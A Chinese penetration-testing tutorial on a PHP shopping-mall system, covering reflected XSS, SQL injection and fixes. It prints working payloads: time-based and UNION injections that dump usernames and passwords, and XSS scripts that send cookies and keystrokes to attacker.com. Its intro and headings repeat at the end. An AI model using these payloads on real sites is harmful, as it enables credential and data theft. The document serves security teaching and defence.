商城系统渗透测试与漏洞挖掘实战指南<\/h1>

1. 前言与概述<\/h2>
本教学文档基于某商城系统的实际渗透测试案例，详细分析SQL注入、XSS和文件上传等常见Web漏洞的发现与利用过程。这些漏洞类型在Web应用中普遍存在，理解其原理和利用方法对安全测试人员至关重要。<\/p>

2. 自动化代码审计<\/h2>

2.1 Seay代码审计工具使用<\/h3>

工具选择<\/strong>：Seay源代码审计系统是一款针对PHP代码的自动化审计工具<\/p> <\/li>

审计重点<\/strong>：<\/p>

查找直接使用$_GET<\/code>、$_POST<\/code>等超全局变量的代码片段<\/li>
关注包含id<\/code>等常见参数的SQL查询语句<\/li>
检查文件上传功能的过滤机制<\/li> <\/ul> <\/li>
典型发现<\/strong>：<\/p> 多处存在直接拼接用户输入到SQL语句的情况<\/li> 缺乏对用户输入的过滤和参数化查询<\/li> <\/ul> <\/li> <\/ol> 3. XSS漏洞分析<\/h2> 3.1 反射型XSS漏洞<\/h3> 漏洞位置<\/strong>：\/query.php<\/code>页面<\/p> 漏洞详情<\/strong>：<\/p> URL参数paypass<\/code>未经过滤直接输出到页面<\/li> 攻击向量：\/query.php?no=20240722161122525&paypass="><sCrIpT>alert(1)<\/ScRiPt><\/code><\/li> <\/ul> 代码分析<\/strong>：<\/p> \/\/ 从注释推断的代码逻辑 <\/span><\/span><\/span><\/span>$srow['sta'<\/span>] =<\/span> ...<\/span>; \/\/ 决定是否跳转 <\/span><\/span><\/span><\/span>header<\/span>("Location: query.php?no="<\/span>.<\/span>$md5_trade_no.<\/span>"&paypass="<\/span>.<\/span>$paypass); <\/span><\/span><\/code><\/pre>漏洞成因<\/strong>：<\/p> paypass<\/code>参数未经过任何过滤<\/li> 恶意输入被直接插入到跳转URL中<\/li> 当页面渲染时，恶意脚本被执行<\/li> <\/ol> 4. SQL注入漏洞分析<\/h2> 4.1 搜索功能SQL注入<\/h3> 漏洞文件<\/strong>：template\/g4\/sousuo.php<\/code><\/p> 漏洞代码<\/strong>：<\/p> $pz =<\/span> $_POST['pz'<\/span>]; <\/span><\/span>if<\/span> (!<\/span>empty<\/span>($pz)) { <\/span><\/span> $gsql =<\/span> "SELECT * FROM safwl_goods WHERE gName like '%<\/span>$pz<\/span>%' or id like '%<\/span>$pz<\/span>%' or tpId like '%<\/span>$pz<\/span>%' order by id desc"<\/span>; <\/span><\/span> $grs =<\/span> $DB-><\/span>query<\/span>($gsql); <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞特征<\/strong>：<\/p> 直接拼接用户输入($pz<\/code>)到SQL语句<\/li> 无任何过滤或参数化处理<\/li> 影响多个字段(gName<\/code>, id<\/code>, tpId<\/code>)<\/li> <\/ol> 4.2 SQL注入利用示例<\/h3> 攻击向量<\/strong>：<\/p> POST \/sousuo.php HTTP\/1.1 Host: xxx.xx.xxx.xx Content-Type: application\/x-www-form-urlencoded Content-Length: 102 pz=1%27and%28select%2Afrom%28select%2Bsleep%282%29%29a%2F%2A%2A%2Fun <\/code><\/pre> 解码后实际输入<\/strong>：<\/p> pz=1'and(select*from(select+sleep(2))a\/**\/un <\/code><\/pre> 攻击效果<\/strong>：<\/p> 通过时间盲注技术(sleep(2)<\/code>)验证漏洞存在<\/li> 可进一步利用获取数据库信息<\/li> <\/ul> 4.3 其他SQL注入点<\/h3> 通过ID参数的简单写法推测可能存在多处注入<\/li> 授权与非授权状态下的注入风险差异<\/li> <\/ol> 5. 漏洞利用进阶<\/h2> 5.1 SQL注入深入利用<\/h3> 信息获取<\/strong>：<\/p> 获取数据库版本：pz=1' UNION SELECT 1,version(),3,4-- -<\/code><\/li> 获取表名：pz=1' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -<\/code><\/li> <\/ul> <\/li> 数据提取<\/strong>：<\/p> 获取用户表数据：pz=1' UNION SELECT 1,group_concat(username,':',password),3,4 FROM users-- -<\/code><\/li> <\/ul> <\/li> <\/ol> 5.2 XSS漏洞利用扩展<\/h3> 窃取Cookie<\/strong>：<\/p> <<\/span>script<\/span>><\/span>document.location<\/span>=<\/span>'http:\/\/attacker.com\/steal.php?cookie='<\/span>+<\/span>document.cookie<\/span><<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre><\/li> 键盘记录<\/strong>：<\/p> <<\/span>script<\/span>><\/span>document.onkeypress<\/span>=<\/span>function<\/span>(e<\/span>){new<\/span> Image<\/span>().src<\/span>=<\/span>'http:\/\/attacker.com\/keylog.php?k='<\/span>+<\/span>e<\/span>.keyCode<\/span>;}<<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6. 防御措施<\/h2> 6.1 SQL注入防御<\/h3> 参数化查询<\/strong>：<\/p> $stmt =<\/span> $DB-><\/span>prepare<\/span>("SELECT * FROM safwl_goods WHERE gName LIKE ? OR id LIKE ? OR tpId LIKE ? ORDER BY id DESC"<\/span>); <\/span><\/span>$stmt-><\/span>execute<\/span>(["%<\/span>$pz<\/span>%"<\/span>, "%<\/span>$pz<\/span>%"<\/span>, "%<\/span>$pz<\/span>%"<\/span>]); <\/span><\/span><\/code><\/pre><\/li> 输入过滤<\/strong>：<\/p> $pz =<\/span> addslashes<\/span>($_POST['pz'<\/span>]); \/\/ 基础过滤 <\/span><\/span><\/span>\/\/ 或更好的方式 <\/span><\/span><\/span><\/span>$pz =<\/span> $DB-><\/span>quote<\/span>("%<\/span>$_POST[pz]<\/span>%"<\/span>); <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6.2 XSS防御<\/h3> 输出编码<\/strong>：<\/p> echo<\/span> htmlspecialchars<\/span>($user_input, ENT_QUOTES<\/span>, 'UTF-8'<\/span>); <\/span><\/span><\/code><\/pre><\/li> 内容安全策略(CSP)<\/strong>：<\/p> <meta<\/span> http-equiv<\/span>=<\/span>"Content-Security-Policy"<\/span> content<\/span>=<\/span>"default-src 'self'; script-src 'self'"<\/span>> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 6.3 通用安全建议<\/h3> 使用最新框架的安全功能<\/li> 定期进行代码审计和安全测试<\/li> 实施最小权限原则<\/li> 记录和监控可疑活动<\/li> <\/ol> 7. 总结<\/h2> 本案例展示了常见Web漏洞的实际发现和利用过程，强调了：<\/p> 用户输入永远不可信的原则<\/li> 安全开发实践的重要性<\/li> 自动化工具与手动验证结合的必要性<\/li> 纵深防御的安全理念<\/li> <\/ol> 通过理解这些漏洞的原理和利用方法，安全人员可以更有效地发现和修复系统中的安全问题。<\/p>

商城系统渗透测试与漏洞挖掘实战指南<\/h1>

1. 前言与概述<\/h2> 本教学文档基于某商城系统的实际渗透测试案例，详细分析SQL注入、XSS和文件上传等常见Web漏洞的发现与利用过程。这些漏洞类型在Web应用中普遍存在，理解其原理和利用方法对安全测试人员至关重要。<\/p>

2. 自动化代码审计<\/h2>

3. XSS漏洞分析<\/h2>

4. SQL注入漏洞分析<\/h2>

5. 漏洞利用进阶<\/h2>

6. 防御措施<\/h2>

1. 前言与概述<\/h2>
本教学文档基于某商城系统的实际渗透测试案例，详细分析SQL注入、XSS和文件上传等常见Web漏洞的发现与利用过程。这些漏洞类型在Web应用中普遍存在，理解其原理和利用方法对安全测试人员至关重要。<\/p>